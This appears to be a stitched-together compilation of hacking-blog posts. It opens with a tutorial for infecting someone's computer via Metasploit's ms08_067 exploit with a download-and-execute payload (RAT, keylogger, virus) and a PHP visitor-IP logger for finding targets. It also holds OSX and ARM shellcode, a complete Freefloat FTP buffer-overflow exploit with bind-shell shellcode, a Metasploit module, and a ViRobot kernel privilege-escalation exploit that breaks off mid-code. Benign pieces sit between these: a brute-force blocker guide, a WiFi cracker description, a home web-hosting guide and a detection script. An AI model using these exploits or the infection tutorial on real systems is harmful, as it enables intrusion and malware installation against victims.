Wow, my hands have gone stiff from not writing... now it's time to update this stuff again,,, ok, let's continue...
This tutorial covers how to infect someone's IP via Metasploit, so that we can plant a program, virus, worm, RAT, keylogger or whatever else you like,
ok, continuing
Here we need two tools that you are probably all familiar with by now
namely
METASPLOIT
NMAP
The very first thing we do is of course find a target
If the target is on a local network you can use any of the various IP scanner tools, that's easy,,,
But what if you want to know someone's IP on the internet?
Here's just a small pointer
First we make a PHP script that captures the IP address of whoever visits the script
Here's the script
<?php
// Append the visitor's address to ip.txt (full open tag instead of the short tag,
// which is disabled on many PHP installs)
$file = "ip.txt";
$ip = $_SERVER['REMOTE_ADDR'];
$handle = fopen($file, 'a');
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fclose($handle);
?>
Ok, once we have the IP we go on and open Metasploit
1. First we have to create a database by
typing db_create in Metasploit
2. Then we scan the target IP with nmap: type nmap in Metasploit, then nmap -sT -sV target ip
Once the scan is done we get some information; if it contains anything relating to Windows 2000 or XP (SP1, SP2, SP3), it means we can infect that IP without problems
3. In Metasploit type use windows/smb/ms08_067_netapi
then type 'set target 0'
'show payloads'
'set payload windows/download_exec'
show options
set RHOST target IP
Now after that comes the most important part: which program we want to infect that IP (computer) with.
Whether we infect it with a virus, worm, RAT, keylogger, or whatever else you like
we type set url http://www.site.com/xxx.exe
and finally we type exploit
Bruteforce attacks against the ssh and ftp services are really annoying. Some idle browsing led me to an interesting tool that is fairly easy to use.
Bruteblock lets system administrators block bruteforce attacks aimed at UNIX services.
How does this tool work?
By analysing the system log and then adding the attacker's IP address to an ipfw2 table, the tool can block brute-force attackers.
The IP address is then automatically deleted from that table after a configured period of time. Bruteblock also uses regular expressions to parse the log, which gives flexibility in how it is operated, so the tool can be used for almost any network service.
How to install? Just simple... follow these steps
1. Install from ports:
#cd /usr/ports/security/bruteblock
#make install clean
2. Add the following lines to /etc/rc.conf so bruteblock starts straight away at boot
bruteblockd_enable="YES"
bruteblockd_table="1"
bruteblockd_flags="-s 5"
3. Edit the file /etc/syslog.conf
Change the following line:
auth.info;authpriv.info /var/log/auth.log
to
auth.info;authpriv.info |exec /usr/local/sbin/bruteblock -f /usr/local/etc/bruteblock/ssh.conf
4. Restart syslogd
#/etc/rc.d/syslogd restart
5. Start bruteblock with the command:
#/usr/local/etc/rc.d/bruteblockd.sh start
6. Add ipfw rules to block the IPs that bruteblock inserts into the table
#ipfw add 400 deny ip from me to table\(1\)
#ipfw add 410 deny ip from table\(1\) to me
7. If you want to change the bruteblock settings for each protected service, say I want to change the ssh settings in the file /usr/local/etc/bruteblock/ssh.conf,
pay attention to the following points
regexp = sshd.*Illegal user \S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
regexp1 = sshd.*Failed password for (?:illegal user )?\S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
# Number of failed login attempts within time before we block
max_count = 4
# Time in seconds in which all failed login attempts must occur
within_time = 60
# Time in seconds to block ip in firewall
# 10 minutes
reset_ip = 600
# IPFW table number to add "bad" hosts
ipfw2_table_no = 1
You can apply this to other services too, for example ftp. You only need to change the regexp part, adjusting it to the log format of that service.
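As an added example (not part of the tutorial or of bruteblock itself), here is the same count-within-a-window-then-block-for-a-while logic in Python, replayed over a constructed auth.log excerpt using the ssh.conf regexes and thresholds shown above; the sample lines, host name and year are assumptions, and the in-memory dict stands in for the ipfw table.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# The two ssh.conf patterns from the tutorial, compiled as Python regexes.
PATTERNS = [
    re.compile(r"sshd.*Illegal user \S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"),
    re.compile(r"sshd.*Failed password for (?:illegal user )?\S+ from "
               r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"),
]

# Thresholds from ssh.conf: block after max_count failures inside within_time
# seconds, and lift the block reset_ip seconds later.
MAX_COUNT = 4
WITHIN_TIME = 60
RESET_IP = 600


class BruteBlocker:
    """Per-source failure counter with timed blocks.

    self.blocked stands in for the ipfw table; a real deployment would turn
    the return values of feed() and expire() into table add/delete actions.
    """

    def __init__(self, year=2010):
        self.year = year                    # syslog timestamps carry no year (assumed)
        self.failures = defaultdict(deque)  # ip -> recent failure timestamps
        self.blocked = {}                   # ip -> datetime the block expires

    def _timestamp(self, line):
        # Constructed lines start with the classic "Mon DD HH:MM:SS" syslog prefix.
        return datetime.strptime("%d %s" % (self.year, line[:15]), "%Y %b %d %H:%M:%S")

    def expire(self, now):
        """Drop blocks whose reset_ip period has passed; return the IPs released."""
        released = [ip for ip, until in self.blocked.items() if until <= now]
        for ip in released:
            del self.blocked[ip]
        return released

    def feed(self, line):
        """Consume one log line; return the IP if this line triggered a block."""
        now = self._timestamp(line)
        self.expire(now)
        match = next((m for m in (p.search(line) for p in PATTERNS) if m), None)
        if match is None:
            return None
        ip = match.group(1)
        if ip in self.blocked:
            return None                     # already in the table
        recent = self.failures[ip]
        recent.append(now)
        # Keep only failures inside the within_time window.
        while (now - recent[0]).total_seconds() > WITHIN_TIME:
            recent.popleft()
        if len(recent) >= MAX_COUNT:
            self.blocked[ip] = now + timedelta(seconds=RESET_IP)
            recent.clear()
            return ip
        return None


def run_log(text, year=2010):
    """Replay a log; return ([(ip, line_no) of blocks fired], [IPs still blocked])."""
    blocker = BruteBlocker(year)
    fired = []
    for n, line in enumerate(text.splitlines(), 1):
        ip = blocker.feed(line)
        if ip:
            fired.append((ip, n))
    return fired, sorted(blocker.blocked)


# Constructed auth.log excerpt: four failures from one host inside 20 s,
# one stray failure from another host, then the first host back after 10 min.
SAMPLE_LOG = """\
Nov 16 10:15:01 bsdbox sshd[1201]: Failed password for root from 203.0.113.7 port 51234 ssh2
Nov 16 10:15:05 bsdbox sshd[1203]: Failed password for illegal user admin from 203.0.113.7 port 51236 ssh2
Nov 16 10:15:09 bsdbox sshd[1205]: Illegal user oracle from 203.0.113.7
Nov 16 10:15:12 bsdbox sshd[1207]: Accepted publickey for alice from 198.51.100.4 port 40000 ssh2
Nov 16 10:15:20 bsdbox sshd[1209]: Failed password for root from 203.0.113.7 port 51240 ssh2
Nov 16 10:16:30 bsdbox sshd[1211]: Failed password for root from 198.51.100.4 port 40010 ssh2
Nov 16 10:26:00 bsdbox sshd[1213]: Failed password for root from 203.0.113.7 port 51250 ssh2
"""

if __name__ == "__main__":
    fired, still_blocked = run_log(SAMPLE_LOG)
    print("blocks fired:", fired)                   # [('203.0.113.7', 5)]
    print("still blocked at end:", still_blocked)   # []
```

The fourth failure on line 5 fires the block; by line 7 the 600-second reset has elapsed, so that line counts as a fresh first failure rather than being ignored.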
Easy, right?...
Comments are welcome here..
DOWNLOAD
http://zeestuff.wordpress.com/2010/11/06/tangkis-serangan-bruteforce-pada-freebsd-unix/#more-74
source : tecon-crew
Wireless security auditing application
This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools.
It should work on any version of linux running the following:
Requirements:
python
python-qt4
macchanger
aircrack-ng
xterm
For Slax distributions, download the zipped module package from the download section, and follow the instructions in the "README" file.
To install, simply run the following command in a terminal after changing directory to the path where the downloaded package is:
dpkg -i Fern-Wifi-Cracker_1.1_all.deb
The software icon can be found in the application menu of the GNOME desktop interface.
The icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "Fern_Wifi_Cracker.desktop"
Images:
Click the refresh button to display monitor interfaces:
Decrypted keys are automatically added to the database after a successful attack, but you can also add the keys manually.
The database file could be found at /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db
NOTE: It's normal for your VGA screen to adjust and return while the application is initializing; this is because the software has to adjust to a suitable resolution before running. If not, the text on the application overlaps or certain text becomes invisible.
Hosting a website from your home PC which can be accessed from anywhere worldwide
Hello everyone.. welcome back with me... marvellous a.k.a. Liyan oz
Probably some of you already know this, but many don't... so this tutorial is for the second lot of people, i.e. those who don't know how to use their own personal desktop machine to host a website which can be accessed from anywhere around the world.
Been using it for around a month now and thought why not share it over here ;) ..
I learnt this method from a friend who has nothing to do with HF and have made the complete tutorial myself, which took me a hell of a lot of time.. and so no part of this tutorial has been leeched from anyone and no one can say that it's theirs just because they use this method themselves... cos 10000s of people round the globe are using it. Am just trying to help the newbies and if I make any kind of error don't flame me
Requirements:
To start off you'll just require a PC with Windows loaded on it. Pretty much works on all Windows versions :) ..
Nothing more is required :D
Step 1 :
Goto DynDNS. Click on Sign In.
It should look something like this:
http://img203.imageshack.us/img203/1637/89403494.png
Step 2 :
Then Click on Create an Account. You should be redirected to the registration page which looks like this:
http://img263.imageshack.us/img263/572/18892149.png
Fill in all the necessary details as required. After filling it in, the page would look something like this:
http://img135.imageshack.us/img135/5926/46115337.png
Then click on Create Account and you should be redirected to a page showing that the account is created, which looks like this :
http://img41.imageshack.us/img41/7326/92990336.png
Step 3 :
Go to the email ID which you provided during the registration. In my case the email went to the spam box.
Open the email and go to the mail from DynDNS.
It looks something like this
http://img8.imageshack.us/img8/3893/66820418.png
Click on the confirmation link. On clicking it you will be redirected to the DynDNS site, where it asks for password confirmation. Enter the password which you entered during registration and you will be shown a page stating that the account is activated.
http://img28.imageshack.us/img28/6110/28900678.png
http://img828.imageshack.us/img828/388/97742084.png
Step 4 :
Click on Add Hostname.
This takes you to next page.
Enter any hostname of your choice and enter your current machine's IP address in the specified slot.
After filling it should look something like this :
http://img153.imageshack.us/img153/6231/75921400.png
Now click on Add to cart at the bottom of the page.
This takes you to a page : http://img135.imageshack.us/img135/2263/63344696.png
Click Next
It takes you to a price summary page which looks like this:
http://img189.imageshack.us/img189/5227/30244360.png
Click Activate services on the page, which takes you to this page:
http://img715.imageshack.us/img715/6793/28850505.png
Step 5 :
Now click on support on the top of the page and then on update client on the left hand side.
This takes you to this page: http://img715.imageshack.us/img715/3523/78946032.png
Now download the DynDNS Updater onto your local machine.
http://img840.imageshack.us/img840/7889/46189333.png
Step 6 :
Now time for Installation
When you open the installer file it looks something like this: -------image 16
Go on Clicking Next ... http://img812.imageshack.us/img812/3707/63194612.png
When installation ends, you get this: http://img222.imageshack.us/img222/4535/82718638.png
Click Finish.
When it opens, you see this : http://img263.imageshack.us/img263/5320/18043052.png
Select the DNS host which we created earlier, click Apply and then click OK.
On clicking OK... you can see this : http://img401.imageshack.us/img401/2807/54145072.png
Cool... so your IP is in sync with the hostname
Step 7 :
Now my machine does not have the Apache server installed.. so I'll go to http://httpd.apache.org
The page looks something like this: http://img256.imageshack.us/img256/6906/18788668.png
Now click on "from a mirror" link on the left hand side. This takes you to the downloads section which looks like :
http://img827.imageshack.us/img827/7315/45156565.png
Now you can either choose the latest version available or the most stable version that's available in the downloads section.
I'll choose the most stable version, i.e. 2.2.17.
So, click on the Win32 Binary including OpenSSL and download it.
Step 8 :
Then, launch the Apache installation. The main screen when you open the download is as : http://img222.imageshack.us/img222/547/92653498.png
When you click on Next you get a screen like : http://img189.imageshack.us/img189/1231/42707644.png which asks you for some details.
The details have to be filled in the same way we entered them last time for DynDNS. Enter your email ID for the admin email ID.
The filled details will look like this : http://img404.imageshack.us/img404/9084/34613609.png
Click Next. Then you get this screen http://img148.imageshack.us/img148/3688/76736775.png.
Click Finish.
At this point I want to say something.. you're DONE doing all the required settings. Yipee
Step 9 :
Now, to test whether all the settings are proper and we can view our local website on the WWW, we open our browser and enter the host address of the DynDNS which we set up earlier.
It looks something like this.
http://img525.imageshack.us/img525/8392/91348770.png
And it says.... It works !! .... wow....
Means we are done setting up our website using our local PC and this website can be viewed from any place around the world.
LolZZ.. and for the others who feel that this is fake and I'm just viewing it cos it's hosted on my local machine and I'm accessing it by localhost, let's use any online proxy site and visit the link to see if we can view the website.
I chose our own.. hidemyass.com ... The homepage looks like this : http://img151.imageshack.us/img151/2456/66840544.png
When I open the pre-specified URL in the online proxy, the site is visited via an IP different from ours, i.e. similar to the way a different machine would view the URL.. and what we see is ... http://img528.imageshack.us/img528/6531/48179935.png ... means... OUR HARD WORK PAID OFF AND OUR WEBSITE IS HOSTED ONLINE AND THAT TOO FREE OF COST FOR AN UNLIMITED PERIOD OF TIME
Step 10 :
To others who are new to this and don't know where to put the files to host the website, put your own "index" page and the other files at the location : C:\Program Files\Apache Software Foundation\Apache2.2\htdocs ... just replace the index file and you can view the new site which you will be uploading. The place you upload your new index file and the other files looks like this.. http://img822.imageshack.us/img822/4714/66616122.png
It took me a lot of time to create this tutorial, especially to set up the whole thing again and take screenshots of everything. So, haters pleaseee :hi: stay off ...
Hope this tutorial was helpful for you all ... Kindly comment and let me know whether you like it or not.
==========================================
OSX/Intel - setuid shell x86_64 - 51 bytes
==========================================
/*
* Title: OSX/Intel - setuid shell x86_64 - 51 bytes
* Date: 2010-11-25
* Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0
* Author: Dustin Schultz - twitter: @thexploit
*
* http://thexploit.com
*
* BITS 64
*
* section .text
* global start
*
* start:
* a:
* mov r8b, 0x02 ; Unix class system calls = 2
* shl r8, 24 ; shift left 24 to the upper order bits
* or r8, 0x17 ; setuid = 23, or with class = 0x2000017
* xor edi, edi ; zero out edi
* mov rax, r8 ; syscall number in rax
* syscall ; invoke kernel
* jmp short c ; jump to c
* b:
* pop rdi ; pop ret addr which = addr of /bin/sh
* add r8, 0x24 ; execve = 59, 0x24+r8=0x200003b
* mov rax, r8 ; syscall number in rax
* xor rdx, rdx ; zero out rdx
* push rdx ; null terminate rdi, pushed backwards
* push rdi ; push rdi = pointer to /bin/sh
* mov rsi, rsp ; pointer to null terminated /bin/sh string
* syscall ; invoke the kernel
* c:
* call b ; call b, push ret of /bin/sh
* db '/bin//sh' ; /bin/sh string
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";
int main(int argc, char **argv) {
    void *ptr = mmap(0, 0x33, PROT_EXEC | PROT_WRITE | PROT_READ,
                     MAP_ANON | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }
    memcpy(ptr, shellcode, sizeof(shellcode));
    sc = ptr;
    sc();
    return 0;
}
# oz
==============================================
linux/ARM - Bind Connect UDP Port 68 Shellcode
==============================================
/*
* Title: arm-bind-connect-udp
* Brief: Bind to port 68 on any local address and plug a udp shell
* onto port 67 on 192.168.0.1
* Author: Daniel Godas-Lopez <gmail account dgodas>
*/
.if 1
/*
close(3), close(4), ..., close(1024)
*/
mov %r1, $1024
1: mov %r0, %r1
svc 0x00900006
subs %r1, %r1, $1
subs %r2, %r1, $3
bpl 1b
.endif
/*
soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
*/
mov %r0, $2 /* AF_INET */
mov %r1, $2 /* SOCK_DGRAM */
mov %r2, $17 /* IPPROTO_UDP */
push {%r0, %r1, %r2}
mov %r0, $1 /* socket */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_des */
/*
bind(soc_des, (struct sockaddr*) &serv_addr, sizeof(serv_addr));
*/
.if 0 /* r0 == r6 already */
mov %r0, %r6 /* soc_des */
.endif
mov %r1, $0x44000000
add %r1, $2 /* port = 68, family = 2 (AF_INET) */
sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $2 /* bind */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
connect(soc_des, (struct sockaddr*) &cli_addr, sizeof(cli_addr));
*/
mov %r0, %r6 /* soc_des */
mov %r1, $0x43000000
add %r1, $2 /* port = 67, family = 2 (AF_INET) */
mov %r2, $0x1000000
add %r2, %r2, $0xa800
add %r2, $0xc0 /* addr = 192.168.0.1 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $3 /* connect */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
*/
mov %r1, $2
1: mov %r0, %r6
svc 0x0090003f
subs %r1, %r1, $1
bpl 1b
/*
execve("/bin/sh", parms, env);
*/
sub %r1, %sp, $4 /* argv[0] = "sh" */
sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
mov %r3, $0x2f
mov %r7, $0x62
add %r3, %r7, lsl $8
mov %r7, $0x69
add %r3, %r7, lsl $16
mov %r7, $0x6e
add %r3, %r7, lsl $24 /* '/' 'b' 'i' 'n' */
mov %r4, $'/'
mov %r7, $'s'
add %r4, %r7, lsl $8
mov %r7, $'h'
add %r4, %r7, lsl $16 /* '/' 's' 'h' 0x00 */
mov %r5, $'s'
mov %r7, $'h'
add %r5, %r7, lsl $8 /* 's' 'h' 0x00 0x00 */
push {%r1, %r2, %r3, %r4, %r5}
add %r0, %sp, $8 /* filename ptr */
add %r1, %sp, $0 /* argv ptr */
add %r2, %sp, $4 /* env ptr */
svc 0x0090000b
=======================================================
Freefloat FTP Server Buffer Overflow Vulnerability 0day
=======================================================
# Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability
# Date: 12/05/2010
# Author: 0v3r
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
import socket
import sys
def usage():
    print "usage : ./freefloatftp.py <victim_ip> <victim_port>"
    print "example: ./freefloatftp.py 192.168.1.100 21"
#Bind Shell shellcode port 4444
shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
"\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
"\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
"\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
"\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
"\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
"\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
"\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
"\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
"\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
"\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
"\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
"\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
"\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
"\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
"\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
"\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
"\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
"\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
"\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
"\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
"\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
"\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")
junk1 = "\x41" * 230
eip = "\x53\x93\x42\x7E" #7E429353 JMP ESP
nops = "\x90" * 16
junk2 = "\x43" * (1000 - len(junk1 + eip + nops + shellcode))
buff = junk1 + eip + nops + shellcode + junk2
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\n"
print "----------------------------------------------------------------"
print "| Freefloat FTP Server Buffer Overflow Vulnerability |"
print "----------------------------------------------------------------"
print "\n"
if len(sys.argv) != 3:
    usage()
    sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
try:
    print("[-] Connecting to " + ip + " on port " + port + "\n")
    s.connect((ip,int(port)))
    data = s.recv(1024)
    print("[-] Sending exploit...")
    s.send('USER ' + buff + '\r\n')
    s.close()
    print("[-] Exploit successfully sent...")
    print("[-] Connect to " + ip + " on port 4444")
except:
    print("[-] Connection error...")
    print("[-] Check if victim is up.")
===================================================
Freefloat FTP Server Buffer Overflow Exploit (Meta)
===================================================
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Freefloat FTP <= 1.00 Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a vulnerability in Freefloat FTP service version 1.00.
        This module uses the USER command to trigger the overflow.
      },
      'Author'         =>
        [
          '0v3r',                 # original version
          'Muhamad Fadzil Ramli'  # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: $',
      'References'     =>
        [
          [ 'EDB', '15689' ],
          [ 'URL', 'http://www.freefloat.com/software/freefloatftpserver.zip' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'RPORT'    => 21
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'           => 512,
          'BadChars'        => "\x00\x0a\x0d\xff\x20",
          'StackAdjustment' => -3500,
          'DisableNops'     => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3 (EN)', { 'Ret' => 0x5AD86AEB } ], # push esp, ret [uxtheme.dll]
        ],
      'DisclosureDate' => 'December 5 2010',
      'DefaultTarget'  => 0))

    deregister_options('FTPUSER','FTPPASS')
  end

  def check
    connect
    disconnect
    if (banner =~ /FreeFloat Ftp Server \(Version 1\.00\)/)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect
    print_status("Trying target #{target.name}...")
    buf = rand_text_alpha(230)
    buf << [target.ret].pack('V')
    buf << make_nops(16)
    buf << payload.encoded
    #buf << rand_text_alpha(1000 - buf.length)
    #send_cmd( ['USER',buf],false )
    send_user(buf)
    handler
    disconnect
  end
end
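As an added example, not part of 0v3r's exploit or of the Metasploit module, the two things a defender can take from the code above are the greeting banner that the module's check() keys on and the shape of the overflowing USER command (230 bytes of filler, a 4-byte return address, a 16-byte NOP sled, then the payload, padded out to 1000 bytes). The script below turns both into simple checks and runs them over constructed FTP control-channel lines; the alert thresholds, the session lines and the placeholder return-address and payload bytes are assumptions.

```python
import re

# Banner regex the Metasploit module's check() uses (from the module above).
VULN_BANNER = re.compile(r"FreeFloat Ftp Server \(Version 1\.00\)")

# Legitimate usernames are a few dozen bytes; the exploit sends ~1000.
MAX_USER_LEN = 128        # assumed alert threshold
NOP_SLED = b"\x90" * 8    # assumed minimum run of 0x90 worth flagging


def banner_is_vulnerable(banner):
    """True when an FTP greeting (bytes) matches the vulnerable 1.00 build."""
    return VULN_BANNER.search(banner.decode("latin-1")) is not None


def inspect_ftp_command(raw):
    """Examine one client->server control line (bytes) and return the list of
    reasons it looks like an overflow attempt; an empty list means benign."""
    reasons = []
    verb, _, arg = raw.rstrip(b"\r\n").partition(b" ")
    if verb.upper() != b"USER":
        return reasons
    if len(arg) > MAX_USER_LEN:
        reasons.append("USER argument is %d bytes (> %d)" % (len(arg), MAX_USER_LEN))
    if any(c < 0x20 or c > 0x7e for c in arg):
        reasons.append("USER argument contains non-printable bytes")
    if NOP_SLED in arg:
        reasons.append("NOP sled (run of 0x90) inside USER argument")
    return reasons


def scan_session(lines):
    """Run inspect_ftp_command over a command stream; return [(line_no, reasons)]."""
    hits = []
    for n, raw in enumerate(lines, 1):
        reasons = inspect_ftp_command(raw)
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed traffic: a normal login, then a USER line shaped like the exploit
# buffer. The return address and payload bytes are placeholders, not real code.
FAKE_RET = b"\xde\xad\xbe\xef"
FAKE_PAYLOAD = b"\xcc" * 40
MALICIOUS_USER = b"A" * 230 + FAKE_RET + b"\x90" * 16 + FAKE_PAYLOAD
MALICIOUS_USER += b"C" * (1000 - len(MALICIOUS_USER))

SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER " + MALICIOUS_USER + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    print(banner_is_vulnerable(b"220 FreeFloat Ftp Server (Version 1.00).\r\n"))  # True
    for line_no, reasons in scan_session(SAMPLE_SESSION):
        print(line_no, reasons)   # only line 3 fires, with all three reasons
```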
====================================================================
ViRobot Desktop 5.5 and Server 3.5 <=2008.8.1.1 Privilege Escalation
====================================================================
VULNERABLE PRODUCTS
Hauri ViRobot Desktop 5.5 and below
Hauri ViRobot Server 3.5 and below
DETAILS:
VRsecos.sys creates a device called "VRsecos" and handles DeviceIoControl code 0x8307202c, which uses strcpy to copy memory from the IRP SystemBuffer into the driver's data area; this can overwrite critical kernel object memory in vrsecos.sys's data area.
EXPLOIT CODE: (Test On Windows XP SP3 , only for vrsecos.sys == 2008.8.1.1)
// virobot0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
#include "malloc.h"
typedef struct X_DISPATCHER_HEADER{
UCHAR Type ;
UCHAR Absolute ;
UCHAR Size ;
UCHAR Inserted ;
ULONG SignalState ;
LIST_ENTRY WaitListHead ;
}X_DISPATCHER_HEADER , *PX_DISPATCHER_HEADER;
typedef struct X_KMUTANT{
X_DISPATCHER_HEADER Header ;
LIST_ENTRY MutantListEntry ;
PVOID OwnerThread ;
UCHAR Abandoned ;
UCHAR ApcDisable ;
}X_KMUTANT , *PX_KMUTANT;
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{
__asm
{
push 0
push mSize
push mPtr
push ATableType
call pZwQuerySystemInformation
mov status , eax
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2,
ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
PUCHAR *Str
);
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
